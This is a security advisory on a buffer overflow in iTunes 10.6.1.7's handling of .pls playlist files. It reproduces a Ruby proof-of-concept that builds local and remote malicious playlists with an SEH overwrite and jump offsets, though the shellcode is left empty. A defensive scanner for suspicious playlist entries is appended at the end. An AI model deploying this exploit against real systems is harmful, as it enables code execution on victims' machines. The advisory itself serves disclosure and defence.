Remote buffer overflow vulnerability in Apple iTunes '.pls' file
Release date:
Updated on:
Affected Systems:
Apple iTunes 10.6.1.7
Description:
Bugtraq id: 74467
iTunes is a digital media playback application. It is free for Mac and PC users and is used to manage and play digital music and videos.
A remote buffer overflow vulnerability exists in the processing of .pls files in iTunes 10.6.1.7 and other versions. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: Fady Hammed Osman *>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
# Exploit Title: Apple Itunes PLS title buffer overflow
# Date: interval l 26, 2015 (Day of disclosing this exploit code)
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: http://www.apple.com
# Software Link: http://www.apple.com/itunes/download?id=890128564
# Version: 10.6.1.7
# Tested on: Windows Xp sp3
# Exploit-db: http://www.exploit-db.com/author?a=2986
# Youtube: https://www.youtube.com/user/cutehack3r
# Playlist header; the overflow is triggered through the Title1 value.
header = "[Playlist]\r\n"
header << "NumberOfEntries=1\r\n"
header << "File1=http://www.example.com/web/faq/multimedia/sample.mp3\r\n"
header << "Title1="
# Short jumps placed in the next-SEH field.
nseh_longer = "\xeb\x1E\x90\x90"
nseh_shorter = "\xeb\x06\x90\x90"
seh = 0x72d119de # pop ret from msacm32.drv
shell = "" # shellcode bytes omitted
# 1020 --> offset in local exploits
payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell
# 380 or 404 (if itunes wasn't already loaded) --> offset in remote ones using the itms protocol.
payload_remote = header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') + shell
# When using as local exploit
open('ploit.pls', 'w') { |f|
  f.puts payload
}
puts('local file created')
# Place this in a web server and use the itms:// protocol to load it.
open('ploit_remote.pls', 'w') { |f|
  f.puts payload_remote
}
puts('remote file created')
Suggestion:
Vendor patch:
Apple
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.apple.com/support/downloads/
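A defensive check to use alongside the patch, added here as an example and not taken from the advisory or from Apple: it parses a .pls file and flags the kind of over-long, non-printable Title entry that the description refers to. The 256-byte limit, the list of accepted keys and both sample playlists are assumptions made for the example.

```ruby
# Added example, not from the advisory: triage .pls playlists before they
# reach a player. MAX_VALUE_LEN is an assumed policy limit, chosen below the
# 380- and 1020-byte offsets quoted in the advisory's proof of concept.
MAX_VALUE_LEN = 256
KNOWN_KEY = /\A(?:(?:File|Title|Length)\d+|NumberOfEntries|Version)\z/i

# Returns an array of [line_number, key, reason] findings for raw PLS data.
def scan_pls(raw)
  findings = []
  lines = raw.b.split(/\r?\n/) # work on bytes, not on decoded text
  unless lines.first.to_s.strip.downcase == '[playlist]'
    findings << [1, nil, 'missing [playlist] header']
  end
  lines.each_with_index do |line, idx|
    next if idx.zero? || line.strip.empty?
    key, value = line.split('=', 2)
    if value.nil?
      findings << [idx + 1, nil, 'not a key=value line']
      next
    end
    key = key.strip
    findings << [idx + 1, key, 'unknown key'] unless key.match?(KNOWN_KEY)
    if value.bytesize > MAX_VALUE_LEN
      findings << [idx + 1, key, "value is #{value.bytesize} bytes"]
    end
    if value.bytes.any? { |b| b < 0x20 || b > 0x7e }
      findings << [idx + 1, key, 'non-printable bytes in value']
    end
  end
  findings
end

# Constructed samples: one ordinary playlist, one with an oversized Title1.
BENIGN = "[playlist]\r\nNumberOfEntries=1\r\n" \
         "File1=http://www.example.com/sample.mp3\r\nTitle1=Sample\r\n" \
         "Length1=-1\r\nVersion=2\r\n"
SUSPECT = "[playlist]\r\nNumberOfEntries=1\r\n" \
          "File1=http://www.example.com/sample.mp3\r\n" \
          "Title1=" + ('A' * 1020) + "\x90\x90\x90\x90\r\n"

if __FILE__ == $PROGRAM_NAME
  [['benign', BENIGN], ['suspect', SUSPECT]].each do |name, data|
    hits = scan_pls(data)
    puts "#{name}: #{hits.empty? ? 'clean' : hits.inspect}"
  end
end
```

The same function can be run over playlists arriving by mail or download on hosts that cannot be patched immediately; a finding is a reason to quarantine the file, not proof of an exploit.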